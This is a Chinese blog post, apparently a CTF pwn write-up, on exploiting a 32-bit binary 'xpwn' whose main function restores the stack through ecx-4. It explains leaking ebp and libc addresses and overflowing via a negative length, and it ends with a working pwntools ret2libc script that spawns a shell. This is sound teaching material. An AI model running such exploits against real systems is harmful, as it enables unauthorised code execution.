<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="pwn入门,">










<meta name="description" content="ecx-4栈地址保护：先介绍一下这是什么鬼 。。。。。。我们正常栈转移的方式一般都是push ebp 和leave ret 配合，但是这个题确使用的是用ecx来保存main函数的地址main开始：Main 结束:这使得我们构造exp攻击的时候 必须考虑栈恢复（这才是这个题的主要考点）首先在程序中的第一个读取位置：Read函数直接从标准输入流读取数据，那么这就使得它不会自动加\0，这使得read函数">
<meta name="keywords" content="pwn入门">
<meta property="og:type" content="article">
<meta property="og:title" content="特别讨厌的ecx-4">
<meta property="og:url" content="http://yoursite.com/2019/04/24/特别讨厌的ecx-4/index.html">
<meta property="og:site_name" content="时钟">
<meta property="og:description" content="ecx-4栈地址保护：先介绍一下这是什么鬼 。。。。。。我们正常栈转移的方式一般都是push ebp 和leave ret 配合，但是这个题确使用的是用ecx来保存main函数的地址main开始：Main 结束:这使得我们构造exp攻击的时候 必须考虑栈恢复（这才是这个题的主要考点）首先在程序中的第一个读取位置：Read函数直接从标准输入流读取数据，那么这就使得它不会自动加\0，这使得read函数">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="http://yoursite.com/2019/04/24/特别讨厌的ecx-4/1.png">
<meta property="og:image" content="http://yoursite.com/2019/04/24/特别讨厌的ecx-4/2.png">
<meta property="og:image" content="http://yoursite.com/2019/04/24/特别讨厌的ecx-4/3.png">
<meta property="og:image" content="http://yoursite.com/2019/04/24/特别讨厌的ecx-4/4.png">
<meta property="og:image" content="http://yoursite.com/2019/04/24/特别讨厌的ecx-4/5.png">
<meta property="og:image" content="http://yoursite.com/2019/04/24/特别讨厌的ecx-4/6.png">
<meta property="og:image" content="http://yoursite.com/2019/04/24/特别讨厌的ecx-4/7.png">
<meta property="og:image" content="http://yoursite.com/2019/04/24/特别讨厌的ecx-4/9.png">
<meta property="og:image" content="http://yoursite.com/2019/04/24/特别讨厌的ecx-4/8.png">
<meta property="og:updated_time" content="2019-04-24T01:37:32.747Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="特别讨厌的ecx-4">
<meta name="twitter:description" content="ecx-4栈地址保护：先介绍一下这是什么鬼 。。。。。。我们正常栈转移的方式一般都是push ebp 和leave ret 配合，但是这个题确使用的是用ecx来保存main函数的地址main开始：Main 结束:这使得我们构造exp攻击的时候 必须考虑栈恢复（这才是这个题的主要考点）首先在程序中的第一个读取位置：Read函数直接从标准输入流读取数据，那么这就使得它不会自动加\0，这使得read函数">
<meta name="twitter:image" content="http://yoursite.com/2019/04/24/特别讨厌的ecx-4/1.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2019/04/24/特别讨厌的ecx-4/">





  <title>特别讨厌的ecx-4 | 时钟</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">时钟</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">二进制安全</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2019/04/24/特别讨厌的ecx-4/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="时钟">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="时钟">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">特别讨厌的ecx-4</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2019-04-24T09:11:43+08:00">
                2019-04-24
              </time>
            

            

            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/PWM/" itemprop="url" rel="index">
                    <span itemprop="name">PWM</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          
            <span class="post-meta-divider">|</span>
            <span class="page-pv"><i class="fa fa-file-o"></i>
            <span class="busuanzi-value" id="busuanzi_value_page_pv"></span>
            </span>
          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>ecx-4栈地址保护：先介绍一下这是什么鬼 。。。。。。我们正常栈转移的方式一般都是push ebp 和<br>leave ret 配合，但是这个题确使用的是用ecx来保存main函数的地址<br>main开始：<br><img src="/2019/04/24/特别讨厌的ecx-4/1.png" title="This is an image"><br>Main 结束:<br><img src="/2019/04/24/特别讨厌的ecx-4/2.png" title="This is an image"><br>这使得我们构造exp攻击的时候 必须考虑栈恢复（这才是这个题的主要考点）<br>首先在程序中的第一个读取位置：<br><img src="/2019/04/24/特别讨厌的ecx-4/3.png" title="This is an image"><br>Read函数直接从标准输入流读取数据，那么这就使得它不会自动加\0，这使得read函数可以一直往后读取0x40字节，<br>我第一从输入的时候输入了4个1进行调试，同时在这个read函数下方下断点<br><img src="/2019/04/24/特别讨厌的ecx-4/4.png" title="This is an image"><br>程序跑完后，gdb给我们反馈:<br><img src="/2019/04/24/特别讨厌的ecx-4/5.png" title="This is an image"><br>分析数据就得到这时ecx中存的我们的输入， 然后ebp中的值是上图的下面（对照寄存器中ebp的值和栈中的相应的值）<br><img src="/2019/04/24/特别讨厌的ecx-4/6.png" title="This is an image"><br>同时我们可以知道只要通过图中0xffffcfdc – 0xffffcfa0(输入的起始地址) = 0x3c ，即输入0x3c个字符就可以使得<br>栈中直到我们想要的ebp那块都没有\0，这样就可以泄露出ebp的值。<br><img src="/2019/04/24/特别讨厌的ecx-4/7.png" title="This is an image"><br>同时我们也得到了setbuf的地址那么根据这个就可以算出libc的基地址，<br>那么下面就是在构造payload的时候恢复栈，（因为上述的ecx-4，我们必须手动恢复栈，使得程序可以正常运行，否则程序崩溃）<br>那么在第三个read函数哪里，我们通过向第二个read函数输入一个负数，就可以构造出栈溢出：<br>那么我们先不让它栈溢出，通过调试看看ecx-4如何发挥作用：（我们在正常情况下栈恢复的命令哪里下断点）即0804873a，同时为了不形成栈溢出，我们只输入4个a<br><img src="/2019/04/24/特别讨厌的ecx-4/9.png" title="This is an image"><br><img src="/2019/04/24/特别讨厌的ecx-4/8.png" title="This is an image"><br>然后我们根据输入aaaa在栈中的 地址可以得到它跟ebp之间的偏移是68,，同时因为ebp里面存的是我们要恢复的值（把ebp里面的值恢复成本来的），里面的值跟ebp的偏移可以算出来是24，同时我们可以看到main函数的返回地址跟输入的4个a之间的偏移是96，那么我们就可以把system的地址放在main函数的返回地址处。。。<br>那么，我们就得到了脚本。<br>from pwn import <em><br>elf = ELF(‘./xpwn’)<br>sh = process(‘./xpwn’)<br>libc = ELF(‘/lib/i386-linux-gnu/libc.so.6’)<br>context.log_level = “debug”<br>sh.recvuntil(‘Enter username: ‘)<br>sh.send(‘a’ </em> 60)<br>sh.recvuntil(‘a’ <em> 60)<br>setbuf_addr = sh.recv(4)<br>sh.recv(4 </em> 2)<br>main_ebp_addr = u32(sh.recv(4))<br>log.success(‘main_ebp_addr: ‘ + hex(main_ebp_addr))<br>libc_addr = u32(setbuf_addr) - libc.symbols[‘setbuf’]<br>log.success(‘libc_addr: ‘ + hex(libc_addr))<br>sh.recvuntil(‘Please set the length of password: ‘)<br>sh.sendline(‘-1’)<br>sh.recvuntil(‘): ‘)<br>system_addr = libc_addr + libc.symbols[‘system’]<br>log.success(‘system_addr: ‘ + hex(system_addr))<br>binsh_addr = libc_addr + libc.search(‘/bin/sh’).next()<br>log.success(‘binsh_addr: ‘ + hex(binsh_addr))<br>（恢复栈，避免崩溃）<br>sh.send(‘a’<em>(68) + p32(main_ebp_addr + 24) +<br>        ‘a’</em>(96-68-4) + p32(system_addr) +<br>        p32(libc_addr + libc.symbols[‘exit’]) +<br>        p32(binsh_addr) + p32(0))</p>
<p>sh.interactive()</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/pwn入门/" rel="tag"># pwn入门</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/04/13/通过esp扩大栈空间/" rel="next" title="通过esp扩大栈空间">
                <i class="fa fa-chevron-left"></i> 通过esp扩大栈空间
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      

      <section class="site-overview-wrap sidebar-panel sidebar-panel-active">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">时钟</p>
              <p class="site-description motion-element" itemprop="description">二进制小白进阶之路</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">3</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">1</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                
                  <span class="site-state-item-count">1</span>
                  <span class="site-state-item-name">标签</span>
                
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">时钟</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Muse</a> v5.1.4</div>




        
<div class="busuanzi-count">
  <script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  
    <span class="site-uv">
      <i class="fa fa-user"></i>
      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
      
    </span>
  

  
    <span class="site-pv">
      <i class="fa fa-eye"></i>
      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
      
    </span>
  
</div>








        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
